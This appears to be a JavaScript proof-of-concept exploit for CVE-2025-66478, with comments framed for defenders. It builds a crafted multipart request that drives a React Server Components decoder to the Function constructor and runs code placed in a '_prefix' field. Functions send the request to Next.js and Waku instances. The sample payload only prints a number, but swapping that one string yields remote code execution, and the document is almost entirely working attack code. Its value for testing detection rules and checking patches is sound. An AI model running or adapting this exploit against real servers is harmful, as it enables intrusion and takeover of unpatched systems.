最小攻击复现 CVE-2025-66478
// Demonstration request body for the issue named in the page title
// (CVE-2025-66478). Each top-level key becomes one multipart form field.
//
// What makes this body anomalous, from a defender's point of view:
//   - the entry under key 1 is not application data: it carries fields named
//     like decoder-internal state (`status`, `_response`, `value`, `then`);
//   - `_formData.get` holds a property path ending in
//     `constructor:constructor`; on the empty array under key 3, that path
//     is the Function constructor;
//   - `_prefix` holds a JavaScript snippet. Here it is a harmless marker:
//     a vulnerable server prints 50 to its console.
// These strings are useful indicators when reviewing request logs or testing
// a filtering rule, but filtering is a stopgap; the fix is the patched
// framework release from the vendor advisory.
const payload = {
  0: '$1',
  1: {
    status: 'resolved_model',
    reason: 0,
    _response: '$4',
    // JSON text nested inside a string; kept byte-for-byte.
    value: '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
    then: '$2:then',
  },
  2: '$@3',
  3: [],
  4: {
    _prefix: 'console.log(7*7+1)//',
    _formData: {
      get: '$3:constructor:constructor',
    },
    _chunks: '$2:_response:_chunks',
  },
};
// Third-party `form-data` package: builds a multipart/form-data body in
// memory and supplies the matching Content-Type header with its boundary.
const FormDataLib = require('form-data');

const fd = new FormDataLib();

// One form field per top-level key of `payload`; every value is sent as
// JSON text.
for (const [fieldName, fieldValue] of Object.entries(payload)) {
  fd.append(fieldName, JSON.stringify(fieldValue));
}

// Print the exact body and headers that will go on the wire. This output is
// what to compare against captured traffic or feed to a detection rule
// under test.
const wireBody = fd.getBuffer().toString();
console.log(wireBody);

const wireHeaders = fd.getHeaders();
console.log(wireHeaders);
/**
 * Next.js variant: POSTs the prepared multipart body to `baseUrl` with a
 * `next-action` header whose value is the literal `x`, then logs the
 * response object and the response text.
 *
 * Request shape to look for in proxy or application logs: a POST carrying a
 * `next-action` header together with a multipart/form-data body.
 *
 * The promise chain is not returned and has no rejection handler.
 *
 * @param {string} baseUrl - URL of the instance under test.
 * @returns {void}
 */
function exploitNext(baseUrl) {
  const requestHeaders = {
    'next-action': 'x',
    ...fd.getHeaders(),
  };
  const requestInit = {
    method: 'POST',
    headers: requestHeaders,
    body: fd.getBuffer(),
  };

  fetch(baseUrl, requestInit)
    .then((response) => {
      console.log('fetched', response);
      return response.text();
    })
    .then((bodyText) => {
      console.log('got', bodyText);
    });
}
/**
 * Waku variant: POSTs the same multipart body to `<baseUrl>/RSC/foo.txt`,
 * sending only the multipart headers (no `next-action` header), then logs
 * the response object and the response text.
 *
 * Request shape to look for in logs: a multipart/form-data POST to a path
 * under `/RSC/`.
 *
 * The promise chain is not returned and has no rejection handler.
 *
 * @param {string} baseUrl - URL of the instance under test.
 * @returns {void}
 */
function exploitWaku(baseUrl) {
  const endpoint = baseUrl + '/RSC/foo.txt';
  const requestInit = {
    method: 'POST',
    headers: fd.getHeaders(),
    body: fd.getBuffer(),
  };

  fetch(endpoint, requestInit)
    .then((response) => {
      console.log('fetched', response);
      return response.text();
    })
    .then((bodyText) => {
      console.log('got', bodyText);
    });
}
// Set the URL of the instance under test, then uncomment the matching line.
// exploitNext('http://localhost:3003')
// exploitWaku('http://localhost:3002')